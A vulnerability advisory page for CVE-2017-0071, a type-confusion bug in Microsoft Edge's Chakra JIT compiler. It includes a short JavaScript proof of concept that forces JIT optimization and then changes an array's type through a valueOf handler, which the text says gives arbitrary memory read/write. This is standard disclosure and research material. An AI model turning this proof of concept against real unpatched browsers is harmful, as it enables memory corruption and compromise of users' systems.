Microsoft Edge Charkra Incorrect Jit Optimization

Published
Credit
Risk
2017.03.18
lokihardt
Medium
CWE
CVE
Local
Remote
N/A
CVE-2017-0071
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.6/10
10/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

Microsoft Edge: Chakra incorrect jit optimization with TypedArray setter.

CVE-2017-0071


PoC:

"use strict";

function func(a, b, c) {
a[0] = 1.2;
b[0] = c; <<<<----------------------- (1)
a[1] = 2.2;
a[0] = 2.3023e-320;
}

function main() {
var a = [1.1, 2.2];
var b = new Uint32Array(100);

// force to optimize
for (var i = 0; i < 0x10000; i++)
func(a, b, i);

func(a, b, {valueOf: () => {
a[0] = {}; <<<<----------------------- (2)

return 0;
}});

a[0].toString();
}

main();

In the above code, Chakra assumes that the type of |a| will be still a native float array after executing (1), even we could change its type with the valueOf handler( (2) ). So it could result in type confusion.

The attached PoC will reproduce arbitrary memory read/write.

Tested on Microsoft Edge 38.14393.0.0.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com